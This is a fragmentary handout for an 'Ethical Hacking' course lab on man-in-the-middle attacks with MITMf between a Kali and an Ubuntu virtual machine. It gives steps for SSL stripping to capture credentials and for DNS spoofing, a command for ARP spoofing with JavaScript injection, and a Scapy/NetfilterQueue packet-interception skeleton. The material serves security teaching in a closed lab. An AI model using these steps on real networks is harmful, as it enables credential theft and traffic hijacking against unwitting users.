Professional Documents
Culture Documents
Lab 4
Spoofing with MITMf
NOTE: Make sure that your Kali VM is running on VB fine and network is set as
“NatNetwork”. You also need Ubuntu VM for today’s task. You can configure
Ubuntu in the same way as Kali. Check whether Kali and Ubuntu communicate
with each other through NatNetwork using ping command.
Note that SSL strip will work if your www.yahoo.com is not on the HSTS
(HTTP Strict Transport Security) list. If the SSL strip does not work well, it
may mean that www.yahoo.com is on HSTS list. If you want to remove
www.yahoo.com from HSTS in the Firefox browser,
1) Close all open tabs
2) Open the browsing history (Ctrl + Shift + H)
3) Search "yahoo"
4) Right click on all sites under yahoo.com and select "Forget About This
Site".
5) Make sure that you access www.yahoo.com again while mitmf in Kali
VM is running.
1
CSCI369 Ethical Hacking
This material is copyrighted. It must not be
distributed without permission from
Joonsang Baek and Jongkil Kim
Check what happens on the terminal of Kali VM. Can you see username (and
password, if you have an account)?
Another interesting attack you can also perform using mitmf is DNS spoofing.
– When a victim try to open a website on the target machine, he/she will be
redirected to a different web site the attacker has set up.
Now add *.unsw.edu.au and = < IP of kali VM>, save the change.
2
CSCI369 Ethical Hacking
This material is copyrighted. It must not be
distributed without permission from
Joonsang Baek and Jongkil Kim
b. Note that there are a lot of options for “inject”. (Please check using mitmf
– h|less). Go back to Ubuntu VM and open a web browser and visit
www.uow.edu.au. What happens?
c. We have used –js-payload. Can we inject javascript file? You can use – js-
file option to inject a javascript file. Create a javascript file using text
editor (file name: inject.js) and inject the file into the target’s web browser
by running
$ python mitmf.py --arp --spoof --gateway <IP of
gateway> --target <IP of Ubuntu> -i eth0 --inject --
js-file ./inject.js
If you are familiar with javascript, you can inject something more interesting.
Try! Note that we can do much more powerful thing with this later on.
5. (Advanced work with mitmf) Although mitmf itself is a very powerful tool, an
ethical hacker wants to do more than tailored attacks than that were already
implemented in mitmf. They want to do work that is more advanced. One
possible way to use Scapy and NetFilterQueue to analyze and manipulate the
packets on live traffic.
Note: The role of the program NetFilterQueue is to enable manipulate packets
(matched by iptables in Unix) using Python.
2) Run mitmf for the arp spoofing. For example, if the gateway IP address is
10.0.2.1 and the victim IP address is 10.0.2.15, then you can run the
following command to hijacking the traffic:
3
CSCI369 Ethical Hacking
This material is copyrighted. It must not be
distributed without permission from
Joonsang Baek and Jongkil Kim
3) Add IP routing table using the following command. This will redirect
incoming traffic to NetFilterQueue.
$ iptables -t nat -A PREROUTING -j NFQUEUE --queue-
num 1
def callback(packet):
payload = packet.get_payload() #extract payload
of a packet
pkt = IP(payload) #copy the packet to pkt using
Scapy
def main():
q = NetfilterQueue() #set NetfilterQueue()
q.bind(1, callback) #set the size of queue and
bind NetfilterQueue object to the function you define
try:
q.run() # Main loop
except KeyboardInterrupt:
q.unbind() #release binding
main()
5) Access some sites in Ubuntu VM and check whether you can see the
information of the packet, properly.